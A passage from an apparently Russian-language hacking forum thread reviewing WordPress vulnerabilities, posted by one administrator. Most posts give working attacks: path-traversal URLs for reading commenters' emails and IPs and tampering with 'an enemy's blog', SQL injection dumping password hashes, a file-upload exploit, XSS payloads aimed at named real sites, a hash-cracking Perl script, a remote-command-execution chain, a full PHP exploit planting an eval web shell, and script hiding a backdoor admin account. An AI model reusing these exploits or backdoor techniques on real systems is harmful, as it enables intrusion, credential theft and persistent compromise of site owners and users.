 |
 |
Приветствую Вас Гость | RSS |
 |
 |
 |
|
    |
 | |  |
|
|
Обзор уязвимостей WordPress
| |
| Decide | Дата: Среда, 14.11.2012, 10:53 | Сообщение # 46 |
 Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Как можно посмотреть IP-адреса и e-mail людей, которые оставили свои комментарии на блоге WordPress?
Недавно обнаруженная уязвимость в WordPress версий до 2.5 с моей доработкой предоставляет тебе такую возможность Итак, чтобы посмотреть полную конфиденциальную инфу комментаторов на блоге, ты должен зарегистрироваться и пройти по адресу http://blog.com/wp233....mments. Также эта бага позволяет тебе всячески поиздеваться над блогом недоброжелателя, например:
-редактировать структуру ссылок (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/options%252dpermalink);
-активировать и деактивировать плагины (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/plugins);
-активировать и деактивировать темы оформления (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/themes);
-просматривать все посты блога (включая черновики) (http://blog.com/wp233/?cat=1.php/../../../../wp%252dadmin/edit).
И многое другое Ты можешь сам подставлять названия файлов из каталога ./wp-admin и ставить свои опыты над вордпрессом.
З.Ы. По непроверенной информации бага работает только на Windows-платформах, но, так как я занимался данной уязвимостью только на винде, на никсах можешь поэксперементировать сам.
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:53 | Сообщение # 47 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WP <=2.3.2
SQL-ing big5
В дополнение к GBK sql-inj, описанной в теме выше.
Для big5 эксплоит будет выглядеть как
Код HTML:
/index.php?exact=1&sentence=1&s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23
====================
WP <=2.5.0
Обход регистрации.
При импорте блога происходит создание юзеров из гостей с дефолтным паролем "changeme"
====================
WP <=2.3.1
Broken Access Control is_admin()
ONLY WINDOWS
Вы должны быть авторизованы!
В дополнение к урлам МАГа:
Код HTML:
/?cat=1.php/../../../../wp%252dadmin/options%252dwriting
Локальный инклуд произвольного файла:
Код HTML:
/?cat=1.php%2F..%2F..%2F..%2F..%2Fwp%252dadmin%2Fpl ugins&action=error_scrape&plugin=..%5C..%5Cindex.php
====================
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:53 | Сообщение # 48 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| http://localhost/wp....ript%3E
http://localhost/wp....ript%3E
Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
Код:
<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2>
<h3>SaO</h3>
<h4>BiyoSecurityTeam || www.biyosecurity.com</h4>
<i>Plugin URI: http://giulioganci.netsons.org/downloads-manager<i >
<hr color="#f0f8ff">
<fieldset name="upl" class="options">
<form action="http://[site]/wp-content/plugins/downloads-manager/upload.php?up=http://[site]/wp-content/plugins/downloads-manager/upload/" method="post" enctype="multipart/form-data" name="upload">
<table cellspacing="0" cellpadding="3">
<tr>
<td>Local File</td>
</tr>
<tr>
<td><input name="upfile" type="file" id="upfile" size="50"><input type="hidden" name="MAX_FILE_SIZE" value="2048"></td>
<td><input type="submit" name="up" value="Send" class="button" /></td>
</tr>
</table>
</form>
</fieldset>
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:54 | Сообщение # 49 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress Exploit Scanner
Цитата:
This plugin searches the files and database of your website for signs of suspicious activity. It will not stop someone hacking into your site, but it may help you find any uploaded or compromised files left by the hacker.
When a website is compromised, hackers leave behind scripts and modified content that can be found by manually searching through all the files on a site. Some of the methods used to hide their code or spam links are obvious, like using CSS to hide text, and we can search for those strings.
The database can also be used to hide content or be used to run code. Spam links are sometimes added to blog posts and comments. They’re hidden by CSS so visitors don’t see them, but search engines do. Recently, hackers took advantage of the WP plugin system to run their own malicious code. They uploaded files with the extensions of image files and added them to the list of active plugins. So, despite the fact that the file didn’t have a .php file extension, the code in them was still able to run!
More Info and Download:
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:54 | Сообщение # 50 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Code Full path disclosure:
Код:
http://site/wp-content/plugins/firestats/js/firestats.js.php
http://site/wp-content/plugins/firestats/php/ajax-handler.php?FS_FULL_INSTALLATION=1
http://site/wp-content/plugins/firestats/php/footer.php
http://site/wp-content/plugins/firestats/php/page-help.php
http://site/wp-content/plugins/firestats/php/page-import.php
http://site/wp-content/plugins/firestats/php/page-settings.php
http://site/wp-content/plugins/firestats/php/page-stats.php
http://site/wp-content/plugins/firestats/php/tabbed-pane.php
http://site/wp-content/plugins/firestats/php/ezsql/mysql/demo.php
http://site/wp-content/plugins/firestats/php/ezsql/mysql/disk_cache_example.php
http://site/wp-content/plugins/firestats/php/ip2c/benchmark.php
http://site/wp-content/plugins/firestats/php/ip2c/ip2c_test.php
http://site/wp-content/plugins/firestats/php/unzip/sample.php |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:54 | Сообщение # 51 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress Simple Tagging Widget suffers from a cross site scripting vulnerability
Code ################################################## ############################################### # # WordPress Simple Tagging Widget Cross Site Scripting Vulnerability (XSS) # # Script: http://wordpress.org/extend/plugins/simple-tagging-widget/ # ################################################## ############################################### # # Author : kernel_panic # # Site : www.codebomb.org # # Mail : kernel_panic@codebomb.org # ################################################## ############################################### # # DORK : Try to find your own using Google. The vulnerable sites # are: www.site.com/?tag=[XSS] or www.site.com/folder/?tag=[XSS] # ################################################## ############################################### EXAMPLE: http://site.com/?tag=[XSS] e.g.: [XSS]: <script>alert(/XSS/)</script> or try to use others in order to work POC: http://www.wiggler.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E http://dialogos.pasok.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E http://www.programacionweb.net/buscador/?tag=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscri pt%3E ################################################## ################################################# |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:55 | Сообщение # 52 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Forum version 1.7.4 suffers from a cross site scripting vulnerability.
Code ################################################## ############## # # Author: FeDeReR and sinner_01 # Home : www.darkc0de.com & www.hacking.ge # # Email : FeDeReR@avoe.ge & sinn3r01@gmail.com # # Share the c0de! # ################################################## ############## # # Xss # # Soft.Site: http://www.wordpress.com/ # # Dork:Wordpress Forum 1.7.4 # # Dork 2:Fredrik Fahlstad. Version: 1.7.4. # # Xss: http://site.com/path/?forumaction=search # # Search: <script>alert(document.cookie)</script> # # Xss 2: http://site.com/path/?forumaction=showforum&forum=1 # # Post a new topic and type: <script>alert(document.cookie)</script> |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:55 | Сообщение # 53 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress<=2.6.3 XSS vulnerability in RSS Feed Generator
Code ===== noXSS.org Security Advisory ====== Advisory: WordPress XSS vulnerability in RSS Feed Generator Author: Jeremias Reith <jr (at) noxss (dot) org [email concealed]> Published: 2008/11/25 Affected: WordPress < 2.6.5 Summary ======= WordPress prior to v2.6.3 fails to sanitize the Host header variable correctly when generating RSS feeds and is therefore prune to XSS attacks. Web Sites running in a name based virtual hosting setup are not affected as long as they are not the default virtual host. Moreover we only found installations running on the Apache web server to be affected. Vulnerability Details ===================== The function self_link() in wp-includes/feed.php is used to generate absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds: function self_link() { echo 'http' . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://' . $_SERVER['HTTP_HOST'] . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1); } The function does not sanitize the HTTP_HOST variable in any way but WordPress replaces all $_SERVER variables with escaped ones in wp-settings.php: $_SERVER = add_magic_quotes($_SERVER); In almost all setups add_magic_quotes() runs mysql_real_escape_string() over the elements and returns the modified array. Unfortunately this escaping method is not safe in markup context. PoC ==== The Apache web server only disallows '/', '\' and '..' within the host header. The header can therefore contain markup making the following PoC possible: curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.org/blog/feed The given example request will return (without additional newlines): -- snip -- ... <atom:link href="http://\"> <body onload=alert(String.fromCharCode(88,83,83))> /blog/feed" rel="self" type="application/rss+xml" /> ... -- snip -- The embedded JavaScript will be executed in Firefox 3.0.4 due to the triggered switch to Quirks mode. Exploit ======= The following exploit is a semi-stored XSS attack and has been tested with the following setup: - Apache 2.x with IP based virtual hosting - Wordpress 2.6.3 installed in /blog/ - WP Super Cache 0.84 - Firefox 3.0.4 WP Super Cache is a popular WordPress plugin that adds static file caching to WordPress. It greatly increases performance and is often used. It saves generated pages in the wp-content/cache directory and adds mod_rewrite rules to serve cached pages statically. Issuing a malicious request to a vulnerable WordPress installation will lead to a file containing the XSS to be generated and placed within the document root. Request: curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.org/blog/feed Generated file: http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html Firefox will execute the embedded JavaScript even tough the feed is XML because the file is served as text/html. The only missing the step is the calculation cached file's MD5 sum. The following code generates the MD5 checksum: php -r 'echo md5("\"><body onload=alert(String.fromCharCode(88,83,83))>". "/blog/feed"), "\n";' In the default setup the MD5 sum can be generated by concatenating the contents of HTTP_HOST and REQUEST_URI resulting in 0d2ca4617758433a7864d57493be2c5b for the given example. This file can be accessed until the cache expiration mechanism removes it. The default expire time is 3600 seconds. Vendor Response =============== 2008-11-17 Reported to vendor 2008-11-17 Initial response from vendor 2008-11-25 Release of version 2.6.5 |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:56 | Сообщение # 54 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Уязвимый продукт: Wp-Forum <=2.2 (последний на данный момент)
Дорк: inurl: plugins/wp-forum
SQL-injection:
./wp-content/plugins/wp-forum/feed.php?topic=[SQL HERE]
PHP код:
$topic = $_GET['topic'];
if($topic == "all"){
...
}
else{
$posts = $wpdb->get_results("SELECT * FROM $wpforum->t_posts WHERE parent_id = $topic ORDER BY `date` DESC LIMIT 20 ");
$description = __("Forum Topic:", "wpforum")." - ".$wpforum->get_subject($topic);
$title = get_bloginfo('name')." ".__("Forum", "wpforum")." - ".__("Topic: ", "wpforum")." ".$wpforum->get_subject($topic);
}
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:56 | Сообщение # 55 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Уязвимый продукт: Simple:Press Forum - 3.1.4 (последняя на данный момент)
Дорк: inurl: plugins/simple-forum
SQL-injection: ./wp-content/plugins/simple-forum/sf-pmpost.php
Уязвимая переменная : $_POST['pmtoidlist']
PHP код:
$tolist = explode(',', $_POST['pmtoidlist']);
if(!$tolist)
{
update_sfnotice('sfmessage', '1@'.__('No message recipients were set', "sforum"));
return;
}
...
foreach($tolist as $recipient)
{
$recipient = trim($recipient);
...
$sql = "INSERT INTO ".SFMESSAGES;
$sql .= " (sent_date, from_id, to_id, title, message, sentbox, is_reply) ";
$sql .= "VALUES (";
$sql .= "now(), ";
$sql .= $current_user->ID.", ";
$sql .= $recipient.", ";
$sql .= "'".$wpdb->escape($title)."', ";
$sql .= "'".$wpdb->escape($messagecontent)."', ";
$sql .= $sentbox.", ";
$sql .= $reply.");";
if($wpdb->query($sql) === false)
Примерный эксплойт:
Логинимся на форум (для отправки личных сообщений, как правило, на форумах рега открыта):
PHP код:
<form action="http://lamer/platinum/wp-content/plugins/simple-forum/sf-pmpost.php" method="post">
<input type="hidden" name="_wpnonce" value="e5192161fc" />
<input type="hidden" name="_wp_http_referer" value="/platinum/forum/?pmaction=viewinpm&pms=1" />
<input type="hidden" tabindex="0" name="pmaction" id="pmaction" value="savepm" />
<input type="hidden" tabindex="0" name="pmuser" id="pmuser" value="1" />
sql<input name="pmtoidlist" value="" />
<input type="hidden" tabindex="0" name="pmreply" id="pmreply" value="" />
title<input type="text" tabindex="4" name="pmtitle" id="pmtitle" value="" />
text<textarea tabindex="5" name="newpmpost" id="newpmpost" rows="12"></textarea>
<input type="submit" name="newpm" value="ok" />
</form>
Примерная возвращаемая ошибка:
PHP код:
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' sd, '123', 'sdfsdfds', 1, 0)' at line 1]
INSERT INTO wp_sfmessages (sent_date, from_id, to_id, title, message, sentbox, is_rep
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:57 | Сообщение # 56 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress 2.7 PasswordHash Attack Tool
Code ################################################## ###############
#Wordpress 2.7 PasswordHash Attack Tool
#It is based in "Portable PHP password hashing framework"
#for Wordpress 2.7
#Autor: netsoul
#Thanks to Waraxe and m1cr0n
#Contact: netsoul2[at]gmail.com
#ALTO PARANA - PARAGUAY
################################################## ###############
#! /usr/bin/perl -w
use strict;
use Digest::MD5 qw(md5 md5_hex);
use List::Util qw(min);
my $hashP = '$P$BS5/b7lxp4t.0j1ZFTyRcdrvAyxh5R0'; # 12345
my $dictionary = 'mydic.txt'; # Put a dictionary
my $php_version = '5'; # Don't modify if you don't know it
open (f1, "<$dictionary") || die "Error in open file!.\n";
$hashP =~ m{^(\$P\$[/a-zA-Z0-9.]+)};
die "Bad hash!\n" if length($1) != 34;
my ($itoa64) = join('', my @itoa64 =
('.','/','0'..'9','A'..'Z','a'..'z'));
my ($salt, $hash)=$hashP=~m/^(.{0,12})(.+)/;
my ($header)=$salt=~m/^(.{0,3})/;
while (<f1>) {
chomp($_);
print "Current Password: $_\r";
my $found = &finder($_,$salt,$hash);
print "\nPassword FOUND: $_" and last if $found;
print "\nPassword NOT FOUND:" if eof;
}
close f1;
sub b64{
my $input = $_[0];
my @input = split(//,$input);
my $count = $_[1];
my $output = '';
my $i;
do {
my $value = ord($input[$i++]);
$output .= $itoa64[$value & 0x3f];
if ($i < $count){
$value |= ord($input[$i]) << 8;
}
$output .= $itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count){
return $output;
}
if ($i < $count){
$value |= ord($input[$i]) << 16;
}
$output .= $itoa64[($value >> 12) & 0x3f];
return $output if $i++ >= $count;
$output .= $itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
sub EncryptP{
my $password = $_[0];
my $setting = $_[1];
my @setting = split(//,$setting);
my $hash;
my $output = '*0';
$output = '*1' if substr($setting, 0, 2) eq $output;
return $output if substr($setting, 0, 3) ne $header;
my $count_log2 = index($itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30){
return $output;}
my $count = 1 << $count_log2;
my $salt = substr($setting, 4, 8);
return $output if length($salt) != 8;
if ($php_version >= '5') {
$hash = md5($salt . $password);
do {
$hash = md5($hash . $password);
} while (--$count);
} else {
$hash = pack('H*', md5_hex($salt . $password));
do {
$hash = pack('H*', md5_hex($hash . $password));
} while (--$count);
}
$output = substr($setting, 0, 12);
$output .= &b64($hash, 16);
return $output;
}
sub HashP{
my $password = $_[0];
my $salt = $_[1];
my $hash;
$hash = &EncryptP($password,$salt);
return $hash if length($hash) == 34;
}
sub CheckP{
my $password = $_[0];
my $stored_hash = $_[1];
my $hash = &EncryptP($password,$stored_hash);
return $hash;
}
sub finder{
my $password = $_[0];
my $salt = $_[1];
my $hash = $_[2];
my $output = &CheckP($password,&HashP($password,$salt));
return $output eq $salt.$hash;
} |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:57 | Сообщение # 57 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| [weird bug] WP-Syntax <= 0.9.1 Remote Command Execution
Code WP-Syntax - это самый популярный плагин для wordpress для подсветки кода. Его используют на многих сайтах, например Стефан Эссер использует его на своем блоге. Для меня этот плагин представлял интерес, так как обнаружил его в блоге довольно крупной фарма-партнерки. Проведя анализ исходного кода, я нашел достаточно необычную уязвимость, поэтому решил создать отдельную тему. Возможно у кого-нибудь возникнут замечания или мысли по поводу более изящного решения.
WP-Syntax использует библиотеку GeSHi, которая и реализует весь функционал по разбору синтаксиса и составления соответствующего для каждого языка html-кода. Разобрав главный скрипт плагина wp-syntax.php, я перешел к папке test, где хранилось 2 скрипта: index.php и code.php. Code.php содержал примеры кода для разных языков, а index.php выводил их с подсветкой для демонстрации возможностей плагина. Index.php инклудит wp-syntax.php, который в свою очередь подключает geshi.php. По замыслу разработчика wp-syntax.php может вызываться только из контекста WP, в то время как test/index.php может запускаться независимо от платформы, при этом автор решил использовать самопальное подобие механизма WP для выполнения callback-функций. Кто знаком с внутренним устройством WP или хотя бы видел часть кода может понять, что я говорю о функциях add_action(), do_action(), apply_filters() и др.
Самореализованная ф-ция apply_filters выглядит следующим образом:
PHP код:
function apply_filters($tag, $string)
{
global $test_filter;
if (!isset($test_filter[$tag])) return $string;
uksort($test_filter[$tag], "strnatcasecmp");
foreach ($test_filter[$tag] as $priority => $functions)
{
if (is_null($functions)) continue;
foreach($functions as $function)
{
$string = call_user_func_array($function, array($string));
}
}
return $string;
}
Глобальный массив test_filter нигде ранее не инициализируется, поэтому появляется возможность добавить в него произвольные элементы при register_globals=on и впоследствии выполнить любую функцию с помощью call_user_func_array. В WP есть специальная ф-ция - unregister_globals, защищающая от подобных уязвимостей, но здесь другой случай - скрипт работает вне контекста WP.
apply_filters вызывается в нескольких местах, один их них:
PHP код:
<html>
<head>
<title>WP-Syntax Test Page</title>
<link rel="stylesheet" href="../wp-syntax.css" type="text/css" media="screen" />
<?php
test_head();
/* ... */
function test_head()
{
echo apply_filters("wp_head", "");
}
?>
Как видим сложность данного случая заключается в том, что нельзя выполнить функцию с произвольными аргументами - будет передаваться один пустой аргумент с типом string. С первого взгляда мне показалось, что даже банальный phpinfo() выполнить не удастся, так как он принимает аргумент только с типом integer, иначе возникнет ошибка уровня E_WARNING. Однако вникнув в логику ф-ции apply_filters становится ясным, что изменить аргумент для call_user_func_array() можно, так как она выполняется в цикле и присваивает свой результат аргументу для следующей callback-функции. Иначе говоря с помощью специально составленной цепочки функций можно бы было получить -1 и передать это значение в phpinfo (-1 = INFO_ALL). Тут я начал вспоминать все функции PHP, которые могли бы мне помочь в данной ситуации. Как оказалось многие функции, не принимающие аргументов, вызывают ошибку, если предать в них пустое значение. Тем не менее, нужная мне последовательность вызовов функций была найдена:
http://localhost/wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=pi&test_filter[wp_head][99][1]=cos&test_filter[wp_head][99][2]=phpinfo
Сперва вызывается функция pi(), возвращающая значение числа pi. Как ни странно, эта функция, несмотря на отсутствие принимаемых аргументов, не вызывает ошибку "Wrong parameter count for". Далее идет вызов функции cos(), в которую передается значение числа pi. Как известно, cos(pi) = -1, поэтому в phpinfo() попадает нужное значение и выводятся все данные.
Казалось большего уже не достичь, но я продолжал поиск способа для выполнения произвольных команд. Необходимо было найти функцию, которая возвращала бы нужные для меня данные. Эти данные можно бы было получить из окружения, но подходящих функций не попадалось. Однако способ все-таки был найден =)
Ф-ция session_id() может как возвращать значение текущего идентификатора сессии, так и устанавливать его, если был передан аргумент. Мне естественно нужно было получить значение, но как быть с пустым параметром, который постоянно передавался? Я решил проверить возвращаемые значения таким скриптом:
PHP код:
<?php
session_start("");
echo session_id();
echo session_id("");
echo session_id();
?>
Выяснилось, что session_id возвращает значение прошлого идентификатора, несмотря на то, что в функцию был передан параметр. Не знаю баг это или нет, но в доках по этому поводу ничего не сказано. В итоге финальный запрос выглядит следующим образом:
Цитата:
GET /wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
Host: localhost
Cookie: PHPSESSID=dir
Connection: close |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:58 | Сообщение # 58 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress 2.7.0 admin remote code execution vulnerability
by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18
PHP код:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Wordpress 2.7.0 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
site: http://www.80vul.com
dork: "powered by WordPress"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 6) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass post
host: target server (ip/hostname)
path: path to wordpress
user: admin login username
pass: admin login password
post: the available post id
Example:
php '.$argv[0].' localhost /wp/ admin 123456 1
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$post = $argv[5];
$shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwL WNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9 ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
//$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dw LWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD 9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
$shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
/**
* wolvez.php has this code:
* <?eval($_POST[c])?>
*/
$url = $path.'wp-login.php';
$cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);
if (!$admin_cookie)
exit("Exploit Failed!\n");
$url = $path.'wp-admin/user-new.php#add-new-user';
$cmd = '';
$resp = send($admin_cookie[1]);
preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);
if (!$_wpnonce)
exit("Exploit Failed!\n");
$cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
$resp = send($admin_cookie[1]);
if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false)
exit("Exploit Failed!\n");
$url = $path.'wp-login.php';
$cmd = 'log=ryat&pwd=123456';
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);
if (!$editor_cookie)
exit("Exploit Failed!\n");
$url = $path.'wp-admin/post.php?action=edit&post='.$post;
$cmd = '';
send($editor_cookie[1]);
send($admin_cookie[1]);
if (strpos(file_get_contents($shell), 'puret_t') !== false)
exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
exit("Exploit Failed!\n");
function send($cookie = '')
{
global $host, $path, $url, $cmd;
$data = "POST $url HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Referer: http://$host$path \r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "Cookie: $cookie\r\n\r\n";
$data .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
Подробности уязвимости
wp-admin/post.php
PHP код:
if ( current_user_can('edit_post', $post_ID) ) {
if ( $last = wp_check_post_lock( $post->ID ) ) {
$last_user = get_userdata( $last );
$last_user_name = $last_user ? $last_user->display_name : __('Somebody');
$message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
$message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
add_action('admin_notices', create_function( '', "echo '$message';" ) );
//[ex:\';phpinfo();\'];
} else {
wp_set_post_lock( $post->ID );
wp_enqueue_script('autosave');
}
}
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:58 | Сообщение # 59 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Итак, представим, что у нас уже есть доступ к бд и нам необходимо закрепиться на блоге. Для этого создаем нового юзера, даем ему права админа и в бд в таблице wp_usermeta в поле first_name с ИД нашего юзера прописываем:
PHP код:
<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script>" /></label></p>
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:59 | Сообщение # 60 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Уязвимость в модуле статистики wassup
Version: 1.6.4 (вроде как и <=1.6.4)
Активная XSS
Не фильтруется поле Referrer. Уязвимость есть в двух местах: на главной странице статистики и подробной статистике по IP.
Первый код подробной статистики(wassup/lib/action.php):
PHP код:
$raw_table = $wpdb->get_results("SELECT ip, hostname, agent, referrer, search, searchpage, os, browser, language FROM $table_name WHERE wassup_id='".urlencode(attribute_escape($_GET['wassup_id']))."' ORDER BY timestamp ASC LIMIT 1"); ?>
<div><h2><?php _e("Raw data","wassup"); ?>:</h2>
<ul style="list-style-type:none;padding:20px 0 0 30px;">
<?php foreach ($raw_table as $rt) { ?>
...
<li><?php echo __("Referrer","wassup").": ".urldecode($rt->referrer); ?></li>
...
<?php }
} //end foreach ?>
Второй код(wassup/lib/main.php):
PHP код:
$referrer = '<a href="'.$cv->referrer.'" target=_"BLANK">'.stringShortener($cv->referrer, round($max_char_len*.9,0)).'</a>';
...
<?php print $referrer; ?>
Пример:
Код:
GET /wp/ HTTP/1.0
User-Agent: [любой User agent]
Host: localhost
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: XSS к примеру Referer: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2 F%73%63%72%69%70%74%3E
Proxy-Connection: Keep-Alive
|
| |
| |
| |
 | |  |
|
|
|
| Воскресенье, 22.12.2024, 14:27 |
|
